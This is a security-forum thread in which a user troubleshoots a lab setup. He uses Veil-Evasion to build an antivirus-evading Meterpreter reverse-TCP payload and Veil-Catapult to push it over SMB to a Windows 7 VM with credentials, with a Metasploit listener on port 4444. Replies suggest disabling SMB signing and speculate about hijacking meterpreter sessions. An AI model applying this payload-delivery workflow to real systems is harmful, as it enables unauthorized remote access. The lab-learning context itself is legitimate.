Jump to content

Veil-Catapult : EXE transfer


kikimonste
 Share

Recommended Posts

Hi ,

I'm new to hak5 furums ,

I've been having an issue with Veil-Catapult , never seem to work .

Here is what i've done :

Bridged 2 VMs :

One running Kali Linux IP : 192.168.0.101 ,

One running good old Win7 SP1 IP : 192.168.0.102.

Then , start terminal generate payload with veil-evasion using c/meterpreter/rev_tcp

feed Veil-Catapult my payload in EXE delivery mode :

Veil-Catapult

EXE DELIVERY

Enter path to payload : /usr/share/veil-evasion/compiled/load.exe [enter]

Enter target IP : 192.168.0.102 [enter]

Enter target [domain/]username : M-101100 [enter]

Enter target password : 00000 [enter]

Press Enter to lauch : [enter]

Error : Timeout : bad credential.

Exe Delivered Sucessfuly.

Right before that , setted msfconsole with multi/handler using port 4444 listning on ANY (0.0.0.0:4444)

Setting in veil-evasion for payload generation were : LPORT : 4444 LHOST : 192.168.0.101

Now did anyone get this type of error ?

If I did something wrong how do I fix it ?

Thanks a lot guys .

Rick.

Link to comment
Share on other sites

Here is the error.

Veil-Catapult: payload delivery system | [Version]: 1.1
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @veilframework
=========================================================================

Exception: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
[!] Error on 192.168.89.113 with credentials target:00000

[*] Payload upload and triggering complete!

Link to comment
Share on other sites

A quick google on that access denied error resulted in a post somewhere that says you should enter the registry of your attacking machine and find the key "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters”. In there you should create the “RequireSecuritySignature” key as a REG_DWORD and set it to a value of 0.

I've never used any of this, so no guarantees on what it does or if it helps. The actual registry key is described by Microsoft here and I HIGHLY recommend you read it before you kill your machine and come back blaming me for it.

Link to comment
Share on other sites

  • 4 weeks later...

Right before that , setted msfconsole with multi/handler using port 4444 listning on ANY (0.0.0.0:4444)

Setting in veil-evasion for payload generation were : LPORT : 4444 LHOST : 192.168.0.101

Running services on port 4444 is going to be a dead giveaway you are a hacker. Just sayin'. If I was scanning the network and saw 4444 I would think metasploit.

That brings up an interesting question. Is there a reliable way to hijack a meterpreter session? Or maybe use ARP spoofing to make the target machine think you are the intruder machine and effectively MITM the session. It would sure save me a lot of work. Just intercept the attackers commands. Nullify them. Issue your own commands.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...